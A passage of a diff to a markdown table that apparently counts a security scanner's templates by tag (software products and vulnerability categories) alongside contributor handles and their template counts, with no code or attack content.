dr0pd34d | 3 | | | | | | | +| seeyon | 15 | fyoorer | 3 | | | | | | | +| bypass | 15 | andydoering | 3 | | | | | | | +| installer | 15 | farish | 3 | | | | | | | +| backdoor | 15 | ph33r | 3 | | | | | | | +| cve2008 | 15 | taielab | 3 | | | | | | | +| ruby | 15 | dudez | 3 | | | | | | | +| zyxel | 15 | c4sper0 | 3 | | | | | | | +| dashboard | 15 | fxploit | 3 | | | | | | | +| java | 15 | alifathi-h1 | 3 | | | | | | | +| moosocial | 15 | 0w4ys | 3 | | | | | | | +| headless | 14 | isacaya | 3 | | | | | | | | creds-stuffing | 14 | imjust0 | 3 | | | | | | | -| auth | 14 | dr0pd34d | 3 | | | | | | | -| dell | 14 | f1tz | 3 | | | | | | | -| redhat | 14 | mavericknerd | 3 | | | | | | | -| osint-health | 14 | lucasljm2001 | 3 | | | | | | | -| git | 14 | taielab | 3 | | | | | | | -| icewarp | 14 | unstabl3 | 3 | | | | | | | -| nagios | 14 | dudez | 3 | | | | | | | -| domainmod | 14 | vagnerd | 3 | | | | | | | -| jboss | 14 | shifacyclewala | 3 | | | | | | | -| docker | 14 | jarijaas | 3 | | | | | | | -| redis | 14 | parth | 3 | | | | | | | -| headless | 14 | ekrause | 3 | | | | | | | -| node | 14 | j3ssie | 3 | | | | | | | -| npm | 14 | cheesymoon | 3 | | | | | | | -| smtp | 14 | emenalf | 3 | | | | | | | -| rds | 14 | huowuzhao | 3 | | | | | | | -| smb | 14 | z3bd | 3 | | | | | | | -| mysql | 13 | coldfish | 3 | | | | | | | -| cuppa | 13 | evergreencartoons | 3 | | | | | | | -| airflow | 13 | johnjhacking | 3 | | | | | | | -| postgresql | 13 | swissky | 3 | | | | | | | -| abstractapi | 13 | yash anand @yashanand155 | 3 | | | | | | | -| fortigate | 13 | k11h-de | 2 | | | | | | | -| laravel | 13 | thabisocn | 2 | | | | | | | -| graphql | 13 | sascha brendel | 2 | | | | | | | -| osint-dating | 13 | mrharshvardhan | 2 | | | | | | | -| rails | 13 | myztique | 2 | | | | | | | -| sonicwall | 13 | joshlarsen | 2 | | | | | | | -| moosocial | 13 | h0j3n | 2 | | | | | | | -| netgear | 13 | korteke | 2 | | | | | | | -| cuppacms | 13 | w4cky_ | 2 | | | | | | | -| hashicorp | 13 | raesene | 2 | | | | | | | -| osint-political | 13 | amsda | 2 | | | | | | | -| ivanti | 13 | parzival | 2 | | | | | | | -| drupal | 12 | thezakman | 2 | | | | | | | -| zimbra | 12 | joshua rogers | 2 | | | | | | | -| kafka | 12 | paperpen | 2 | | | | | | | -| netsweeper | 12 | cocxanh | 2 | | | | | | | -| webserver | 12 | bananabr | 2 | | | | | | | -| vbulletin | 12 | dahse89 | 2 | | | | | | | -| newrelic | 12 | michal mikolas (nanuqcz) | 2 | | | | | | | -| ofbiz | 12 | g4l1t0 | 2 | | | | | | | -| doppler | 12 | mzack9999 | 2 | | | | | | | -| cache | 11 | brucelsone | 2 | | | | | | | -| prometheus | 11 | ree4pwn | 2 | | | | | | | -| info-leak | 11 | udit_thakkur | 2 | | | | | | | -| jetbrains | 11 | 6mile | 2 | | | | | | | -| hikvision | 11 | christianpoeschl | 2 | | | | | | | -| django | 11 | paradessia | 2 | | | | | | | -| spring | 11 | danmcinerney | 2 | | | | | | | -| xstream | 11 | arliya | 2 | | | | | | | -| online-fire-reporting | 11 | geekby | 2 | | | | | | | -| iam | 11 | notnotnotveg | 2 | | | | | | | -| iis | 11 | shankaracharya | 2 | | | | | | | -| phpgurukul | 11 | thevillagehacker | 2 | | | | | | | -| jolokia | 11 | bing0o | 2 | | | | | | | -| fastjson | 11 | gal nagli | 2 | | | | | | | -| osint-video | 11 | thardt-praetorian | 2 | | | | | | | -| online_fire_reporting_system_project | 11 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| phpmyadmin | 11 | shelled | 2 | | | | | | | -| installer | 11 | sbani | 2 | | | | | | | -| dedecms | 10 | v0idc0de | 2 | | | | | | | -| samsung | 10 | herry | 2 | | | | | | | -| solr | 10 | github.com/its0x08 | 2 | | | | | | | -| db | 10 | wa1tf0rme | 2 | | | | | | | -| elasticsearch | 10 | bsysop | 2 | | | | | | | -| solarview | 10 | pxmme1337 | 2 | | | | | | | -| digitalocean | 10 | d4vy | 2 | | | | | | | -| sitecore | 10 | randomdhiraj | 2 | | | | | | | -| symfony | 10 | foulenzer | 2 | | | | | | | -| glpi | 10 | 666asd | 2 | | | | | | | -| thinkphp | 10 | joeldeleep | 2 | | | | | | | -| zabbix | 10 | lotusdll | 2 | | | | | | | -| xstream_project | 10 | zy9ard3 | 2 | | | | | | | -| dropbox | 10 | koti2 | 2 | | | | | | | -| firebase | 9 | dogancanbakir | 2 | | | | | | | -| opencats | 9 | 0xnirvana | 2 | | | | | | | -| elastic | 9 | 0xsapra | 2 | | | | | | | -| scada | 9 | 0xrudra | 2 | | | | | | | -| secret | 9 | kiblyn11 | 2 | | | | | | | -| exchange | 9 | usdag | 2 | | | | | | | -| sangfor | 9 | supr4s | 2 | | | | | | | -| artica | 9 | charles d. | 2 | | | | | | | -| lucee | 9 | c3l3si4n | 2 | | | | | | | -| python | 9 | bmcel | 2 | | | | | | | -| gitea | 9 | hetroublemakr | 2 | | | | | | | -| dahua | 9 | x1m_martijn | 2 | | | | | | | -| druid | 9 | brenocss | 2 | | | | | | | -| wso2 | 9 | martincodes-de | 2 | | | | | | | -| pfsense | 9 | danielmofer | 2 | | | | | | | -| vcenter | 9 | 0xsmiley | 2 | | | | | | | -| versa | 9 | sinkettu | 2 | | | | | | | -| sophos | 9 | zomsop82 | 2 | | | | | | | -| cloudtrail | 9 | streetofhackerr007 | 2 | | | | | | | -| progress | 9 | y4er | 2 | | | | | | | -| facebook | 9 | afaq | 2 | | | | | | | -| blind | 9 | florianmaak | 2 | | | | | | | -| cnvd2020 | 9 | sy3omda | 2 | | | | | | | -| moodle | 9 | kishore-hariram | 2 | | | | | | | -| crlf | 9 | bp0lr | 2 | | | | | | | -| kube | 9 | pbuff07 | 2 | | | | | | | -| bitbucket | 9 | lstatro | 2 | | | | | | | -| e-office | 8 | kre80r | 2 | | | | | | | -| ognl | 8 | redteambrasil | 2 | | | | | | | -| hms | 8 | ajaysenr | 2 | | | | | | | -| phpjabbers | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| spotweb | 8 | ricardo maia (brainfork) | 2 | | | | | | | -| phpinfo | 8 | vavkamil | 2 | | | | | | | -| gateway | 8 | 0xcrypto | 2 | | | | | | | -| discord | 8 | supras | 2 | | | | | | | -| recon | 8 | cckuakilong | 2 | | | | | | | -| odoo | 8 | t3l3machus | 2 | | | | | | | -| console | 8 | ehsahil | 2 | | | | | | | -| mlflow | 8 | nvn1729 | 2 | | | | | | | -| bucket | 8 | nkxxkn | 2 | | | | | | | -| cloud-enum | 8 | convisoappsec | 2 | | | | | | | -| config-audit | 8 | codexlynx | 2 | | | | | | | -| manager | 8 | mohammedsaneem | 2 | | | | | | | -| spotweb_project | 8 | dheerajmadhukar | 2 | | | | | | | -| atom | 8 | maximus decimus | 2 | | | | | | | -| symantec | 8 | n-thumann | 2 | | | | | | | -| cisco-switch | 8 | ayadim | 2 | | | | | | | -| emerge | 8 | israel comazzetto dos reis | 2 | | | | | | | -| oauth | 8 | manas_harsh | 2 | | | | | | | -| unauthenticated | 8 | gevakun | 2 | | | | | | | -| huawei | 8 | nuk3s3c | 2 | | | | | | | +| docker | 14 | bernardofsr | 3 | | | | | | | +| windows | 14 | shifacyclewala | 3 | | | | | | | +| smb | 14 | yash anand @yashanand155 | 3 | | | | | | | +| login-check | 14 | xianke | 3 | | | | | | | +| npm | 14 | arcc | 3 | | | | | | | +| rds | 14 | atomiczsec | 3 | | | | | | | +| nagios | 14 | yuzhe-zhang-0 | 3 | | | | | | | +| redis | 14 | impramodsargar | 3 | | | | | | | +| jboss | 14 | f1tz | 3 | | | | | | | +| icewarp | 14 | huowuzhao | 3 | | | | | | | +| git | 14 | vsh00t | 3 | | | | | | | +| domainmod | 14 | lucasljm2001 | 3 | | | | | | | +| osint-art | 14 | ambassify | 3 | | | | | | | +| node | 14 | coldfish | 3 | | | | | | | +| redhat | 14 | parth | 3 | | | | | | | +| auth | 14 | ekrause | 3 | | | | | | | +| smtp | 14 | lark-lab | 3 | | | | | | | +| osint-health | 14 | mavericknerd | 3 | | | | | | | +| dell | 14 | canberbamber | 3 | | | | | | | +| osint-political | 13 | davidmckennirey | 3 | | | | | | | +| cuppa | 13 | thomas_from_offensity | 3 | | | | | | | +| osint-dating | 13 | vagnerd | 3 | | | | | | | +| graphql | 13 | bmcel | 2 | | | | | | | +| airflow | 13 | 0xsmiley | 2 | | | | | | | +| hashicorp | 13 | moritz nentwig | 2 | | | | | | | +| laravel | 13 | mrharshvardhan | 2 | | | | | | | +| sonicwall | 13 | ree4pwn | 2 | | | | | | | +| cuppacms | 13 | bp0lr | 2 | | | | | | | +| netgear | 13 | cocxanh | 2 | | | | | | | +| ivanti | 13 | paradessia | 2 | | | | | | | +| abstractapi | 13 | bing0o | 2 | | | | | | | +| postgresql | 13 | supr4s | 2 | | | | | | | +| rails | 13 | 0xsapra | 2 | | | | | | | +| fortigate | 13 | afaq | 2 | | | | | | | +| mysql | 13 | herry | 2 | | | | | | | +| vbulletin | 12 | thevillagehacker | 2 | | | | | | | +| kafka | 12 | shankaracharya | 2 | | | | | | | +| webserver | 12 | z0ne | 2 | | | | | | | +| doppler | 12 | w4cky_ | 2 | | | | | | | +| netsweeper | 12 | maximus decimus | 2 | | | | | | | +| zimbra | 12 | sinkettu | 2 | | | | | | | +| ofbiz | 12 | danmcinerney | 2 | | | | | | | +| newrelic | 12 | nuk3s3c | 2 | | | | | | | +| drupal | 12 | ehsahil | 2 | | | | | | | +| info-leak | 12 | kiblyn11 | 2 | | | | | | | +| cache | 11 | cckuakilong | 2 | | | | | | | +| iam | 11 | supras | 2 | | | | | | | +| iis | 11 | wa1tf0rme | 2 | | | | | | | +| spring | 11 | msegoviag | 2 | | | | | | | +| xstream | 11 | github.com/its0x08 | 2 | | | | | | | +| prometheus | 11 | thezakman | 2 | | | | | | | +| django | 11 | randomdhiraj | 2 | | | | | | | +| online_fire_reporting_system_project | 11 | usdag | 2 | | | | | | | +| osint-video | 11 | streetofhackerr007 | 2 | | | | | | | +| fastjson | 11 | 0xnirvana | 2 | | | | | | | +| hikvision | 11 | michal mikolas (nanuqcz) | 2 | | | | | | | +| jolokia | 11 | martincodes-de | 2 | | | | | | | +| jetbrains | 11 | israel comazzetto dos reis | 2 | | | | | | | +| online-fire-reporting | 11 | christianpoeschl | 2 | | | | | | | +| phpmyadmin | 11 | redteambrasil | 2 | | | | | | | +| phpgurukul | 11 | mohammedsaneem | 2 | | | | | | | +| zabbix | 10 | amirhossein raeisi | 2 | | | | | | | +| elasticsearch | 10 | c3l3si4n | 2 | | | | | | | +| sitecore | 10 | ayadim | 2 | | | | | | | +| solr | 10 | socketz | 2 | | | | | | | +| dahua | 10 | bananabr | 2 | | | | | | | +| xstream_project | 10 | codexlynx | 2 | | | | | | | +| dropbox | 10 | charles d. | 2 | | | | | | | +| digitalocean | 10 | kishore-hariram | 2 | | | | | | | +| samsung | 10 | h0j3n | 2 | | | | | | | +| db | 10 | brucelsone | 2 | | | | | | | +| dedecms | 10 | ajaysenr | 2 | | | | | | | +| thinkphp | 10 | koti2 | 2 | | | | | | | +| solarview | 10 | korteke | 2 | | | | | | | +| symfony | 10 | gal nagli | 2 | | | | | | | +| glpi | 10 | davidegirardi | 2 | | | | | | | +| python | 9 | notnotnotveg | 2 | | | | | | | +| versa | 9 | x1m_martijn | 2 | | | | | | | +| firebase | 9 | pxmme1337 | 2 | | | | | | | +| crlf | 9 | paperpen | 2 | | | | | | | +| moodle | 9 | joshlarsen | 2 | | | | | | | +| exchange | 9 | nkxxkn | 2 | | | | | | | +| bitbucket | 9 | liwermor | 2 | | | | | | | +| cnvd2020 | 9 | t3l3machus | 2 | | | | | | | +| gitea | 9 | thardt-praetorian | 2 | | | | | | | +| sophos | 9 | lstatro | 2 | | | | | | | +| lucee | 9 | sbani | 2 | | | | | | | +| scada | 9 | hackerarpan | 2 | | | | | | | +| cloudtrail | 9 | gevakun | 2 | | | | | | | +| artica | 9 | florianmaak | 2 | | | | | | | +| secret | 9 | bsysop | 2 | | | | | | | +| kube | 9 | ep1csage | 2 | | | | | | | +| wso2 | 9 | parzival | 2 | | | | | | | +| facebook | 9 | lotusdll | 2 | | | | | | | +| elastic | 9 | clarkvoss | 2 | | | | | | | +| pfsense | 9 | d4vy | 2 | | | | | | | +| sangfor | 9 | v0idc0de | 2 | | | | | | | +| opencats | 9 | 0xelkomy | 2 | | | | | | | +| vcenter | 9 | egemenkochisarli | 2 | | | | | | | +| druid | 9 | 0xcrypto | 2 | | | | | | | +| blind | 9 | zomsop82 | 2 | | | | | | | +| progress | 9 | pbuff07 | 2 | | | | | | | +| config-audit | 8 | shelled | 2 | | | | | | | +| e-office | 8 | danielmofer | 2 | | | | | | | +| manager | 8 | 666asd | 2 | | | | | | | +| gateway | 8 | 8arthur | 2 | | | | | | | +| huawei | 8 | udit_thakkur | 2 | | | | | | | +| recon | 8 | convisoappsec | 2 | | | | | | | +| symantec | 8 | joeldeleep | 2 | | | | | | | +| microfocus | 8 | kre80r | 2 | | | | | | | +| phpjabbers | 8 | hetroublemakr | 2 | | | | | | | +| hms | 8 | sascha brendel | 2 | | | | | | | +| cloud-enum | 8 | 0xrudra | 2 | | | | | | | +| nexus | 8 | joshua rogers | 2 | | | | | | | +| ognl | 8 | amsda | 2 | | | | | | | +| wanhu | 8 | dheerajmadhukar | 2 | | | | | | | +| oauth | 8 | foulenzer | 2 | | | | | | | +| discord | 8 | dahse89 | 2 | | | | | | | +| mlflow | 8 | y4er | 2 | | | | | | | +| bucket | 8 | manas_harsh | 2 | | | | | | | +| metadata | 8 | brenocss | 2 | | | | | | | +| phpinfo | 8 | mzack9999 | 2 | | | | | | | | mirai | 8 | rafaelwdornelas | 2 | | | | | | | -| osint-news | 8 | liwermor | 2 | | | | | | | -| error | 8 | ep1csage | 2 | | | | | | | -| wanhu | 8 | z0ne | 2 | | | | | | | -| go | 8 | clarkvoss | 2 | | | | | | | -| metadata | 8 | luci | 2 | | | | | | | -| default-page | 8 | 0xelkomy | 2 | | | | | | | -| ruckus | 7 | davidegirardi | 2 | | | | | | | -| monstra | 7 | uomogrande | 2 | | | | | | | -| keking | 7 | msegoviag | 2 | | | | | | | -| openemr | 7 | 8arthur | 2 | | | | | | | -| teamcity | 7 | dbrwsky | 2 | | | | | | | -| vpc | 7 | hackerarpan | 2 | | | | | | | -| filemanager | 7 | socketz | 2 | | | | | | | -| avtech | 7 | moritz nentwig | 2 | | | | | | | -| fpd | 7 | alex | 1 | | | | | | | -| nortekcontrol | 7 | rotembar | 1 | | | | | | | -| nacos | 7 | ipanda | 1 | | | | | | | -| fortios | 7 | dale clarke | 1 | | | | | | | -| database | 7 | caon | 1 | | | | | | | -| joomla\! | 7 | remi gascou (podalirius) | 1 | | | | | | | -| instrusive | 7 | dabla | 1 | | | | | | | -| car_rental_management_system_project | 7 | thebinitghimire | 1 | | | | | | | -| gogs | 7 | akash.c | 1 | | | | | | | -| squirrelmail | 7 | dmartyn | 1 | | | | | | | -| opensis | 7 | zinminphy0 | 1 | | | | | | | -| rfi | 7 | udinchan | 1 | | | | | | | -| oos | 7 | shivampand3y | 1 | | | | | | | -| activemq | 7 | carson chan | 1 | | | | | | | -| f5 | 7 | yashanand155 | 1 | | | | | | | -| bloofox | 7 | kareemse1im | 1 | | | | | | | -| vms | 7 | aresx | 1 | | | | | | | -| nagiosxi | 7 | kchason | 1 | | | | | | | -| contec | 7 | whynotke | 1 | | | | | | | -| mongodb | 7 | tirtha | 1 | | | | | | | -| blockchain | 7 | watchtowr | 1 | | | | | | | -| shopify | 7 | ap3r | 1 | | | | | | | -| pmb | 7 | ptonewreckin | 1 | | | | | | | -| moodating | 7 | gboddin | 1 | | | | | | | -| bigip | 7 | mayankpandey01 | 1 | | | | | | | -| mobileiron | 7 | adilsoybali | 1 | | | | | | | -| landray | 7 | official_blackhat13 | 1 | | | | | | | -| nexus | 7 | j3ssie/geraldino2 | 1 | | | | | | | -| slack | 7 | zandros0 | 1 | | | | | | | -| twitter | 7 | shreyapohekar | 1 | | | | | | | -| exploitdb | 7 | petruknisme | 1 | | | | | | | -| solarwinds | 7 | luskabol | 1 | | | | | | | -| telesquare | 7 | h4kux | 1 | | | | | | | -| linkedin | 7 | galoget | 1 | | | | | | | -| maps | 7 | p-l- | 1 | | | | | | | -| cacti | 7 | yaser_s | 1 | | | | | | | -| websphere | 7 | adnanekhan | 1 | | | | | | | -| flutterwave | 6 | ahmed abou-ela | 1 | | | | | | | -| gcp | 6 | b4uh0lz | 1 | | | | | | | -| cobbler | 6 | ohlinge | 1 | | | | | | | -| webmin | 6 | freakyclown | 1 | | | | | | | -| servicenow | 6 | 0xkayala | 1 | | | | | | | -| ldap | 6 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| paypal | 6 | rivalsec | 1 | | | | | | | -| asus | 6 | domenicoveneziano | 1 | | | | | | | -| zhiyuan | 6 | hlop | 1 | | | | | | | -| plesk | 6 | tea | 1 | | | | | | | -| geoserver | 6 | mr.bobo hp | 1 | | | | | | | -| doctor_appointment_system_project | 6 | smaranchand | 1 | | | | | | | -| microfocus | 6 | christbowel | 1 | | | | | | | -| elfinder | 6 | archer | 1 | | | | | | | -| 74cms | 6 | natto97 | 1 | | | | | | | -| couchdb | 6 | ling | 1 | | | | | | | -| chanjet | 6 | mchklt | 1 | | | | | | | -| magmi | 6 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| cockpit | 6 | s1r1u5_ | 1 | | | | | | | -| openvpn | 6 | noamrathaus | 1 | | | | | | | -| jetty | 6 | retr0 | 1 | | | | | | | -| advantech | 6 | tim_koopmans | 1 | | | | | | | -| asp | 6 | shifacyclewla | 1 | | | | | | | -| synacor | 6 | banana69 | 1 | | | | | | | -| express | 6 | philippdelteil | 1 | | | | | | | -| keycloak | 6 | soyelmago | 1 | | | | | | | -| leak | 6 | f1she3 | 1 | | | | | | | -| liferay | 6 | w8ay | 1 | | | | | | | -| minio | 6 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| rat | 6 | sttlr | 1 | | | | | | | -| jamf | 6 | ilovebinbash | 1 | | | | | | | -| kubelet | 6 | higor melgaço (eremit4) | 1 | | | | | | | -| lfprojects | 6 | booboohq | 1 | | | | | | | -| server | 6 | viondexd | 1 | | | | | | | -| sql | 6 | zhenwarx | 1 | | | | | | | -| bmc | 6 | regala_ | 1 | | | | | | | -| doctor-appointment-system | 6 | tehtbl | 1 | | | | | | | -| jeecg | 6 | lbb | 1 | | | | | | | -| log | 6 | youngpope | 1 | | | | | | | -| beyondtrust | 6 | 0ut0fb4nd | 1 | | | | | | | -| microstrategy | 6 | ratnadip gajbhiye | 1 | | | | | | | -| splunk | 6 | millermedia | 1 | | | | | | | -| vrealize | 6 | am0nt31r0 | 1 | | | | | | | -| tikiwiki | 6 | aravind | 1 | | | | | | | -| sonarqube | 6 | amirmsafari | 1 | | | | | | | -| typo3 | 6 | rinolock | 1 | | | | | | | -| nuuo | 5 | chesterblue | 1 | | | | | | | -| kkfileview | 5 | mlec | 1 | | | | | | | -| pyload | 5 | r3s ost | 1 | | | | | | | -| sentry | 5 | bughuntersurya | 1 | | | | | | | -| square | 5 | m0ck3d | 1 | | | | | | | -| carrental | 5 | aaronchen0 | 1 | | | | | | | -| genetechsolutions | 5 | dorkerdevil | 1 | | | | | | | -| goanywhere | 5 | furkansenan | 1 | | | | | | | -| redmine | 5 | wpsec | 1 | | | | | | | -| metinfo | 5 | unknown | 1 | | | | | | | -| chamilo | 5 | arall | 1 | | | | | | | -| react | 5 | xeldax | 1 | | | | | | | -| circarlife | 5 | knassar702 | 1 | | | | | | | -| percha | 5 | absshax | 1 | | | | | | | -| vehicle_service_management_system_project | 5 | aayush vishnoi | 1 | | | | | | | -| circontrol | 5 | affix | 1 | | | | | | | -| mikrotik | 5 | charanrayudu | 1 | | | | | | | -| papercut | 5 | _c0wb0y_ | 1 | | | | | | | -| awstats | 5 | d0rkerdevil | 1 | | | | | | | -| apisix | 5 | xstp | 1 | | | | | | | -| matrix | 5 | mammad_rahimzada | 1 | | | | | | | -| open-emr | 5 | elitebaz | 1 | | | | | | | -| rseenet | 5 | harryha | 1 | | | | | | | -| cnvd2023 | 5 | lark lab | 1 | | | | | | | -| hpe | 5 | hakimkt | 1 | | | | | | | -| xmlrpc | 5 | jub0bs | 1 | | | | | | | -| tenda | 5 | aringo-bf | 1 | | | | | | | -| voip | 5 | tangxiaofeng7 | 1 | | | | | | | -| parallels | 5 | brianlam38 | 1 | | | | | | | -| graylog | 5 | dwbzn | 1 | | | | | | | -| agentejo | 5 | iampritam | 1 | | | | | | | -| terramaster | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| tibco | 5 | manasmbellani | 1 | | | | | | | -| schneider-electric | 5 | clment cruchet | 1 | | | | | | | -| adminer | 5 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| decision-center | 5 | thelicato | 1 | | | | | | | -| swagger | 5 | pepitoh | 1 | | | | | | | -| openstack | 5 | kr1shna4garwal | 1 | | | | | | | -| acm | 5 | zeyad azima | 1 | | | | | | | -| jabber | 5 | guax1 | 1 | | | | | | | -| gocd | 5 | metascan | 1 | | | | | | | -| asana | 5 | babybash | 1 | | | | | | | -| hybris | 5 | alperenkesk | 1 | | | | | | | -| sftp | 5 | sanineng | 1 | | | | | | | -| sysaid | 5 | noobexploiter | 1 | | | | | | | -| connectwise | 5 | lethargynavigator | 1 | | | | | | | -| web3 | 5 | paper-pen | 1 | | | | | | | -| firmware | 5 | pry0cc | 1 | | | | | | | -| resin | 5 | husain | 1 | | | | | | | -| glpi-project | 5 | mubassirpatel | 1 | | | | | | | -| cdata | 5 | professorabhay | 1 | | | | | | | -| openai | 5 | skylark-lab | 1 | | | | | | | -| avaya | 5 | luciannitescu | 1 | | | | | | | -| akamai | 5 | duty_1g | 1 | | | | | | | -| thedigitalcraft | 5 | ynnirc | 1 | | | | | | | -| caucho | 5 | lrtk-coder | 1 | | | | | | | -| paloaltonetworks | 5 | vulnspace | 1 | | | | | | | -| 10web | 5 | af001 | 1 | | | | | | | -| zzzcms | 5 | josecosta | 1 | | | | | | | -| elementor | 5 | push4d | 1 | | | | | | | -| cloudflare | 5 | justmumu | 1 | | | | | | | -| strapi | 5 | arjunchandarana | 1 | | | | | | | -| adb | 5 | ky9oss | 1 | | | | | | | -| jupyter | 5 | ahmetpergamum | 1 | | | | | | | -| wbce | 5 | chetgan | 1 | | | | | | | -| mssql | 5 | jas37 | 1 | | | | | | | -| storage | 5 | queencitycyber | 1 | | | | | | | -| magmi_project | 5 | pdp | 1 | | | | | | | -| avideo | 5 | luqmaan hadia | 1 | | | | | | | -| jwt | 5 | evan rubinstien | 1 | | | | | | | -| crushftp | 5 | none | 1 | | | | | | | -| dionaea | 5 | act1on3 | 1 | | | | | | | -| ethereum | 5 | prettyboyaaditya | 1 | | | | | | | -| totolink | 5 | momen eldawakhly | 1 | | | | | | | -| craftcms | 5 | higor melgaço | 1 | | | | | | | -| qnap | 5 | un-fmunozs | 1 | | | | | | | -| fatpipe | 5 | droberson | 1 | | | | | | | -| cve2007 | 5 | _harleo | 1 | | | | | | | -| ems | 5 | carlosvieira | 1 | | | | | | | -| axigen | 5 | brabbit10 | 1 | | | | | | | -| webview | 5 | ledoubletake | 1 | | | | | | | -| arcgis | 4 | patrick pirker | 1 | | | | | | | -| candidats | 4 | shivanshkhari | 1 | | | | | | | -| easypost | 4 | gonski | 1 | | | | | | | -| httpserver | 4 | mohammad reza omrani | | 1 | | | | | | | -| | | @omranisecurity | | | | | | | | -| h3c | 4 | drfabiocastro | 1 | | | | | | | -| newstatpress_project | 4 | adamparsons | 1 | | | | | | | -| puppet | 4 | apt-mirror | 1 | | | | | | | -| casaos | 4 | exploitation | 1 | | | | | | | -| webkul | 4 | hazana | 1 | | | | | | | -| rubyonrails | 4 | deena | 1 | | | | | | | -| pixie | 4 | j33n1k4 | 1 | | | | | | | -| newstatpress | 4 | technicaljunkie | 1 | | | | | | | -| juniper | 4 | jonathanwalker | 1 | | | | | | | -| http | 4 | rojanrijal | 1 | | | | | | | -| tiki | 4 | ayadi | 1 | | | | | | | -| harbor | 4 | hanlaomo | 1 | | | | | | | -| bittrex | 4 | liquidsec | 1 | | | | | | | -| panos | 4 | nielsing | 1 | | | | | | | -| aspose | 4 | godfatherorwa | 1 | | | | | | | -| telerik | 4 | 5up3r541y4n | 1 | | | | | | | -| httpd | 4 | samuelsamuelsamuel | 1 | | | | | | | -| harmistechnology | 4 | b0rn2r00t | 1 | | | | | | | -| hongfan | 4 | harshinsecurity | 1 | | | | | | | -| opencms | 4 | jcockhren | 1 | | | | | | | -| bamboo | 4 | abbas.heybati | 1 | | | | | | | -| ampache | 4 | breno_css | 1 | | | | | | | -| roxy | 4 | elouhi | 1 | | | | | | | -| heroku | 4 | calumjelrick | 1 | | | | | | | -| moveit | 4 | petergrifin | 1 | | | | | | | -| age-encryption | 4 | fopina | 1 | | | | | | | -| terra-master | 4 | hczdmr | 1 | | | | | | | -| sugarcrm | 4 | aaban solutions | 1 | | | | | | | -| powerjob | 4 | oscarintherocks | 1 | | | | | | | -| aria | 4 | unblvr1 | 1 | | | | | | | -| telegram | 4 | matt miller | 1 | | | | | | | -| qdpm | 4 | sec_hawk | 1 | | | | | | | -| thinkcmf | 4 | joaonevess | 1 | | | | | | | -| jsf | 4 | 0xd0ff9 | 1 | | | | | | | -| mantisbt | 4 | phyr3wall | 1 | | | | | | | -| password | 4 | jaimin gondaliya | 1 | | | | | | | -| openfire | 4 | failopen | 1 | | | | | | | -| phppgadmin | 4 | jteles | 1 | | | | | | | -| springcloud | 4 | 0xceba | 1 | | | | | | | -| okta | 4 | vinit989 | 1 | | | | | | | -| search | 4 | esonhugh | 1 | | | | | | | -| zend | 4 | houdinis | 1 | | | | | | | -| intelbras | 4 | viniciuspereiras | 1 | | | | | | | -| flatpress | 4 | pjborah | 1 | | | | | | | -| codeigniter | 4 | exceed | 1 | | | | | | | -| jellyfin | 4 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| flink | 4 | hateshape | 1 | | | | | | | -| metasploit | 4 | jrolf | 1 | | | | | | | -| angular | 4 | michal-mikolas | 1 | | | | | | | -| hongdian | 4 | myst7ic | 1 | | | | | | | -| learnpress | 4 | hotpot | 1 | | | | | | | -| env | 4 | bugvsme | 1 | | | | | | | -| linuxfoundation | 4 | flag007 | 1 | | | | | | | -| spark | 4 | rotemreiss | 1 | | | | | | | -| wpdevart | 4 | jna1 | 1 | | | | | | | -| grav | 4 | pwnwithlove | 1 | | | | | | | -| mailchimp | 4 | miroslavsotak | 1 | | | | | | | -| d-link | 4 | mordavid | 1 | | | | | | | -| joomlamo | 4 | lamscun | 1 | | | | | | | -| osgeo | 4 | mihhailsokolov | 1 | | | | | | | -| pip | 4 | x6263 | 1 | | | | | | | -| kyocera | 4 | igibanez | 1 | | | | | | | -| dom | 4 | b0yd | 1 | | | | | | | -| kentico | 4 | qlkwej | 1 | | | | | | | -| globalprotect | 4 | erethon | 1 | | | | | | | -| linksys | 4 | ruppde | 1 | | | | | | | -| hoteldruid | 4 | notsoevilweasel | 1 | | | | | | | -| concrete | 4 | mesaglio | 1 | | | | | | | -| horde | 4 | shockwave | 1 | | | | | | | -| reprisesoftware | 4 | irshadahamed | 1 | | | | | | | -| froxlor | 4 | h4sh5 | 1 | | | | | | | -| articatech | 4 | 0h1in9e | 1 | | | | | | | -| cve2005 | 4 | aceseven (digisec360) | 1 | | | | | | | -| yeswiki | 4 | miryangjung | 1 | | | | | | | -| webshell | 4 | 1nf1n7y | 1 | | | | | | | -| prtg | 4 | kailashbohara | 1 | | | | | | | -| kevinlab | 4 | th3.d1p4k | 1 | | | | | | | -| umbraco | 4 | rubina119 | 1 | | | | | | | -| zte | 4 | noah @thesubtlety | 1 | | | | | | | -| mcafee | 4 | luqman | 1 | | | | | | | -| dahuasecurity | 4 | lingtren | 1 | | | | | | | -| bitrix | 4 | jbertman | 1 | | | | | | | -| pega | 4 | marcos_iaf | 1 | | | | | | | -| os4ed | 4 | udyz | 1 | | | | | | | -| churchcrm | 4 | 0xtavian | 1 | | | | | | | -| creativeitem | 4 | danfaizer | 1 | | | | | | | -| djangoproject | 4 | dievus | 1 | | | | | | | -| hospital_management_system_project | 4 | imhunterand | 1 | | | | | | | -| linkerd | 4 | kaizensecurity | 1 | | | | | | | -| stripe | 4 | zn9988 | 1 | | | | | | | -| metabase | 4 | kurohost | 1 | | | | | | | -| ebs | 4 | sorrowx3 | 1 | | | | | | | -| digitaldruid | 4 | w0tx | 1 | | | | | | | -| jorani | 4 | osamahamad | 1 | | | | | | | -| dolibarr | 4 | 2rs3c | 1 | | | | | | | -| ternaria | 4 | 0xparth | 1 | | | | | | | -| consul | 4 | undefl0w | 1 | | | | | | | -| royalevent | 4 | amir-h-fallahi | 1 | | | | | | | -| nosqli | 4 | jeya.seelan | 1 | | | | | | | -| pmb_project | 4 | rumble773 | 1 | | | | | | | -| shiro | 4 | compr00t | 1 | | | | | | | -| mitel | 4 | lady_bug | 1 | | | | | | | -| aura | 4 | arqsz | 1 | | | | | | | -| panabit | 4 | invisiblethreat | 1 | | | | | | | -| ray | 4 | andirrahmani1 | 1 | | | | | | | -| igniterealtime | 4 | adrianmf | 1 | | 